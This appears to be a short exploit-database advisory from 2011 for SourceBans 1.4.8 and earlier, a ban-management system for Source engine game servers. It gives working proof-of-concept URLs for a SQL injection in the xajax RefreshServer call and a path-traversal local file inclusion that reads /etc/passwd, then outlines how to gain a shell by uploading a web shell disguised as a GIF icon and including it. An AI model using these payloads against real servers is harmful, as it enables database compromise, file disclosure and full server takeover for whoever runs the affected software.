24 lines
No EOL
995 B
Text
24 lines
No EOL
995 B
Text
# Exploit Title: SourceBans <= 1.4.8 SQL/LFI Injection
|
|
# Date: Dec. 6th 2011
|
|
# Author: Havok
|
|
# Software Link: http://www.sourcebans.net/
|
|
# Version: <= 1.4.8
|
|
|
|
"- What is SourceBans?
|
|
SourceBans is a free global administration and banning system for Source engine based servers."
|
|
|
|
Vulnerabilities:
|
|
|
|
1°) SQL Injection:
|
|
Proof of concept: http://1m-4-1337-m8.c0m/index.php?xajax=RefreshServer&xajaxargs[]=1' <=== SQL Error w00t!
|
|
|
|
2°) LFI Injection:
|
|
Only works when you're authentified as root administrator or as somebody who is able to change the SourceBans theme :
|
|
Proof of concept: http://server/index.php?xajax=SelTheme&xajaxargs[]=../../../../../../../../../../etc/passwd%00
|
|
|
|
Note: There is also a possibility to get a shell by adding "GIF89a" at the very beginning of the shell,
|
|
renaming it to h4x0rz.gif and uploading it as an icon in the admin panel. Then include the file with the LFI and G4M3 0V3R :).
|
|
|
|
=> In memory of crashfr who will NEVER die. Merci pour tout mec! ;-))... R.I.P.
|
|
|
|
./EOF |